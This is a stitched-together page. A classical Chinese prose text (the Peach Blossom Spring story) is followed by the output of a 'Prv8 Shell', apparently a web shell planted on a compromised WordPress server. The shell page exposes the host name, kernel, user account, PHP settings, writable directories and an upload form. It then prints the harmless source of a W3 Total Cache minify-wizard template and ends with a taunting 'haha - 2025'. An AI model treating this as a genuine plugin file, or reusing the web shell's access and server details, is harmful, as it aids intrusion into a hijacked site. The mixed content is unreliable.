晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/stando/www/wp-content/plugins/w3-total-cache/inc/lightbox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/stando/www/wp-content/plugins/w3-total-cache/inc/lightbox/minify_recommendations.php
<?php
namespace W3TC;

if ( !defined( 'W3TC' ) )
	die();

?>
<h3>Minify: Help Wizard</h3>

<p>
    <?php _e( 'To get started with minify, we\'ve identified the following external CSS and JS objects in the', 'w3-total-cache' ); ?>
    <select id="recom_theme">
    <?php foreach ( $themes as $_theme_key => $_theme_name ): ?>
        <option value="<?php echo htmlspecialchars( $_theme_key ); ?>"<?php selected( $_theme_key, $theme_key ); ?>><?php echo htmlspecialchars( $_theme_name ); ?><?php if ( $_theme_key == $theme_key ): ?> (active)<?php endif; ?></option>
    <?php endforeach; ?>
    </select>
    <?php _e( 'theme. Select "add" the files you wish to minify, then click "apply &amp; close" to save the settings.', 'w3-total-cache' ); ?>
</p>

<div id="recom_container">
    <h4 style="margin-top: 0;">JavaScript:</h4>
    <?php if ( count( $js_groups ) ) :?>
    <ul id="recom_js_files" class="minify-files">
        <?php $index = 0; foreach ( $js_groups as $js_group => $js_files ): ?>
        	<?php foreach ( $js_files as $js_file ): $index++; ?>
            <li>
            	<table>
            		<tr>
            			<th class="minify-files-add"><?php _e( 'Add:', 'w3-total-cache' ); ?></th>
            			<th>&nbsp;</th>
            			<th><?php _e( 'File URI:', 'w3-total-cache' ); ?></th>
            			<th><?php _e( 'Template:', 'w3-total-cache' ); ?></th>
            			<th colspan="2"><?php _e( 'Embed Location:', 'w3-total-cache' ); ?></th>
            		</tr>
            		<tr>
            			<td class="minify-files-add">
                			<input type="checkbox" name="recom_js_useit" value="1"<?php checked( isset( $checked_js[$js_group][$js_file] ), true ); ?> />
            			</td>
            			<td><?php echo $index; ?>.</td>
            			<td>
    	                    <input type="text" name="recom_js_file" value="<?php echo htmlspecialchars( $js_file );  /* search w3tc-url-escaping */?>" size="70" />
            			</td>
            			<td>
                            <select name="recom_js_template">
                            <?php foreach ( $templates as $template_key => $template_name ): ?>
                                <option value="<?php echo esc_attr( $template_key ); ?>"<?php selected( $template_key, $js_group ); ?>><?php echo htmlspecialchars( $template_name ); ?></option>
                            <?php endforeach; ?>
                            </select>
            			</td>
            			<td>
            				<?php $selected = ( isset( $locations_js[$js_group][$js_file] ) ? $locations_js[$js_group][$js_file] : '' ); ?>
                            <select name="recom_js_location">
                                <option value="include"<?php selected( $selected, 'include' ); ?>><?php _e( 'Embed in &lt;head&gt;', 'w3-total-cache' ); ?></option>
                                <option value="include-body"<?php selected( $selected, 'include-body' ); ?>><?php _e( 'Embed after &lt;body&gt;', 'w3-total-cache' ); ?></option>
                                <option value="include-footer"<?php selected( $selected, 'include-footer' ); ?>><?php _e( 'Embed before &lt;/body&gt;', 'w3-total-cache' ); ?></option>
                            </select>
            			</td>
            			<td>
			                <input class="js_file_verify button" type="button" value="<?php _e( 'Verify URI', 'w3-total-cache' ); ?>" />
            			</td>
					</tr>
				</table>
            </li>
            <?php endforeach; ?>
        <?php endforeach; ?>
    </ul>
    <p>
    	<a href="#" id="recom_js_check"><?php _e( 'Check / Uncheck All', 'w3-total-cache' ); ?></a>
    </p>
    <?php else:?>
    <p><?php _e( 'No files found.', 'w3-total-cache' ); ?></p>
    <?php endif;?>

    <h4><?php _e( 'Cascading Style Sheets:', 'w3-total-cache' ); ?></h4>

    <?php if ( count( $css_groups ) ) :?>
    <ul id="recom_css_files" class="minify-files">
        <?php $index = 0; foreach ( $css_groups as $css_group => $css_files ): ?>
    		<?php foreach ( $css_files as $css_file ): $index++; ?>
            <li>
            	<table>
            		<tr>
            			<th class="minify-files-add"><?php _e( 'Add:', 'w3-total-cache' ); ?></th>
            			<th>&nbsp;</th>
            			<th><?php _e( 'File URI:', 'w3-total-cache' ); ?></th>
            			<th colspan="2"><?php _e( 'Template:', 'w3-total-cache' ); ?></th>
            		</tr>
            		<tr>
            			<td class="minify-files-add">
                        	<input type="checkbox" name="recom_css_useit" value="1"<?php checked( isset( $checked_css[$css_group][$css_file] ), true ); ?> />
                        </td>
            			<td><?php echo $index; ?>.</td>
                        <td>
                            <input type="text" name="recom_css_file" value="<?php echo htmlspecialchars( $css_file ); /* search w3tc-url-escaping */ ?>" size="70" />
						</td>
						<td>
                            <select name="recom_css_template">
                            <?php foreach ( $templates as $template_key => $template_name ): ?>
                            <option value="<?php echo esc_attr( $template_key ); ?>"<?php selected( $template_key, $css_group ); ?>><?php echo htmlspecialchars( $template_name ); ?></option>
                            <?php endforeach; ?>
                            </select>
						</td>
						<td>
			                <input class="css_file_verify button" type="button" value="<?php _e( 'Verify URI', 'w3-total-cache' ); ?>" />
						</td>
					</tr>
				</table>
            </li>
    	    <?php endforeach; ?>
        <?php endforeach; ?>
    </ul>
    <p>
    	<a href="#" id="recom_css_check"><?php _e( 'Check / Uncheck All', 'w3-total-cache' ); ?></a>
    </p>
    <?php else:?>
    <p>No files found.</p>
    <?php endif;?>
</div>

<div id="recom_container_bottom">
    <p>
        <input class="recom_apply button-primary" type="button" value="<?php _e( 'Apply &amp; close', 'w3-total-cache' ); ?>" />
    </p>

    <fieldset>
        <legend><?php _e( 'Notes', 'w3-total-cache' ); ?></legend>

        <ul>
            <li><?php _e( 'Typically minification of advertiser code, analytics/statistics or any other types of tracking code is not recommended.', 'w3-total-cache' ); ?></li>
            <li><?php _e( 'Scripts that were not already detected above may require <a href="admin.php?page=w3tc_support&amp;request_type=plugin_config">professional consultation</a> to implement.', 'w3-total-cache' ); ?></li>
        </ul>
    </fieldset>
</div>

haha - 2025